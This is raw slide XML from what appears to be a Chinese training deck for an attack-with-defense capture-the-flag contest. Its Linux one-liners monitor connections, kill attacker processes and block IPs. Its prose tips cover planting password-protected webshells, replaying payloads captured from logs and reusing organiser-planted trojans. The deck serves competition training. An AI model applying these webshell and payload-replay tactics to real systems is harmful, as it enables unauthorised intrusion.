              <a:rPr sz="2000" spc="-25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-240" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>S) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>a, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>S[a]}'</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="78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显示每</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ip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并统计连接数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45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75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25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-ntu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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90" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>'{print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>$5}'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-13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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105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35" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>cut</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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50" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-d:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105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35" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-f1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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40" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>uniq</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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105" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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40" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95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-60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>-n</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="765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历史命令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70" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr sz="2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7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2913" y="516127"/>
            <a:ext cx="5899785" cy="2170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必 备 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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h </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-6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l l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命</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-13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令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63830">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="805"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-1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C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="4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r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1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5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sz="900" spc="-4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i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n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="4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t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1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r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sz="900" spc="4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u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="4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7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c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t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i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="4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900" spc="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n</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="57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1300" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>实时监控和关闭危险</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的连接</a:t>
            </a:r>
            <a:endParaRPr sz="13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9235">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="540"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="240665" algn="l"/>
                <a:tab pos="241935" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>获取攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr sz="13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IPLIST=`netstat -atnp | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>"ESTA"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| awk '{print $4}' | awk -F ":" '{print $1}' | sort</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="13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-u`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 marR="4729480">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef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ip in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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$IPLIST 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do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77165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="365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$ip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5157" y="2995422"/>
            <a:ext cx="23977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'{print $7}' | awk -F "/" '{print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="13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$1}'`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913" y="2658770"/>
            <a:ext cx="3424554" cy="3748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165" marR="5080" indent="-165100">
              <a:lnSpc>
                <a:spcPct val="134000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•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# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>获 取 攻 击 者 的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1300" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>对 应 系 统 的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PID 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PID=`netstat -antp | grep "192.168.55.107" | awk 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pid in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$PID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77165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530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do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540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echo $pid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530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kill -9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$pid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530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if [ $? -eq 0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="13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];then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42900" marR="906145" indent="164465">
              <a:lnSpc>
                <a:spcPct val="134000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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echo "kill $ip, exec success..."  else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508000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef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echo "kill $ip, exec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failed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, please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check..."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540"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>fi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 marR="2919095" indent="164465">
              <a:lnSpc>
                <a:spcPct val="134000"/>
              </a:lnSpc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done  done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sleep(3)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 8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535" y="583565"/>
            <a:ext cx="3276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2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8631" y="659637"/>
            <a:ext cx="971486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线 下 环 境 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="49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析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5969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  <a:p>
            <a:pPr marL="241300" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="3170"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64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比赛前主办方可能提供竞赛拓扑。</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-5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8600">
              <a:lnSpc>
                <a:spcPts val="3170"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64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800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>参</a:t>
            </a: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赛者</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>要</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5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攻</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="280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击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5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机、靶</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>机、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15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check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" spc="-15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服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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网络架构做到心中有数。</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-5" dirty="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241300" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="3170"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64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常见网络</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>拓</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>扑：</a:t>
            </a:r>
            <a:endParaRPr sz="2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7335" y="2303145"/>
            <a:ext cx="5565140" cy="38519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8834" y="658367"/>
            <a:ext cx="5285105" cy="156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必 备 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15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h </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10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e </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-6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l l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命</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-13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令</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill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  <a:p>
            <a:pPr marL="407035" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="406400" algn="l"/>
                <a:tab pos="407670" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Linux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根据占用的端口号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来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关闭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相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应的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进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程：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683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kill -9 $(lsof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-i:22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|awk '{print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$2}')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576" y="2723769"/>
            <a:ext cx="2258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用防火墙禁止某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个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ip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452" y="2223998"/>
            <a:ext cx="4984115" cy="12331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87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用防火墙禁止某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个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32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iptables -I INPUT -s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59.151.119.180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-j DROP  iptables -I INPUT -s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59.151.119.180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-j</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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ACCEPT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8452" y="3928109"/>
            <a:ext cx="6911340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indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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last 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该命令用来列出目前与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过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去登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录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系统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的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用户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相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关信</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>息</a:t>
            </a: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90204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="29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382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="382905" algn="l"/>
                <a:tab pos="383540" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>统计端口的连接数</a:t>
            </a:r>
            <a:endParaRPr sz="20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netstat -nat|grep -i "80" |wc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 9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4069" y="630427"/>
            <a:ext cx="170561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b="1" spc="-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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-18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D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小 技</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-4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巧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5" y="1158875"/>
            <a:ext cx="9843135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264795" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527685" algn="l"/>
                <a:tab pos="528320" algn="l"/>
              </a:tabLst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现场做代码审计不现实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日志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是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发</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-35" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>现</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-110" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Web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漏洞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的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主要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手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段。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>WAF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要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上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700" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>但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要保 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证自己服务器上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的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>waf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能随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时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卸载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如果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被</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-85" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-8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可以不拦截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只记录日志。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527685" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1810"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527685" algn="l"/>
                <a:tab pos="528320" algn="l"/>
              </a:tabLst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可以写一个自动分析日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志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的程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序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，重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放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别人</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-55" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-70" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-70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看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是否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攻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击成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功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90204"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr sz="135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1700" spc="-160" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>PWN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一定要做，而且越早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做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出来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得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分越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多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r>
              <a:rPr sz="1700" spc="-160" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>PWN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是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拉开差距的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重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要手段，题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527685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
            </a:pP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目不会很难，而且很多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队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伍不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会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防守。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527685" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst>
                <a:tab pos="527685" algn="l"/>
                <a:tab pos="528320" algn="l"/>
              </a:tabLst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网站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目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录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的权限通常会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限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制得比较严，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需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要想办法上传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自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己的木马来执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行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命令。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527685" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1810"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst>
                <a:tab pos="527685" algn="l"/>
                <a:tab pos="528320" algn="l"/>
              </a:tabLst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主办方很可能会在比赛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过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程中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设</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-30" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-235" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>NPC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木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马，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应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立即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利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用该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木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马打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一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遍，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如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果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527685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
            </a:pP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删除不了木马可以尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-30" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-65" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>cat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命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令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修改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木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马内</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-15" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>容</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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527685" marR="219075" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
              <a:tabLst>
                <a:tab pos="527685" algn="l"/>
                <a:tab pos="528320" algn="l"/>
              </a:tabLst>
            </a:pP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木马通常需要加密，对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不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同的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靶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机上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传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的木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马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可以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设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置不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同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的密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码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，防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止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自己 的木马被其他队伍监测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流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量而</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>利</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>用。</a:t>
            </a:r>
            <a:endParaRPr sz="17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10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94" y="36285"/>
            <a:ext cx="12155605" cy="67854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081" y="233934"/>
            <a:ext cx="11745595" cy="6391910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11745595" h="6391909">
                <a:moveTo>
                  <a:pt x="0" y="6391655"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6391655"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="41148">
            <a:solidFill>
              <a:srgbClr val="B5B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539495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69" h="547369">
                <a:moveTo>
                  <a:pt x="0" y="547115"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="547116" y="547115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547116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</a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F4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5179" y="652652"/>
            <a:ext cx="170561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b="1" spc="-7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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-18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D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小 技</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-4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巧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090" y="1651635"/>
            <a:ext cx="9479915" cy="1828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5"/>
              </a:spcBef>
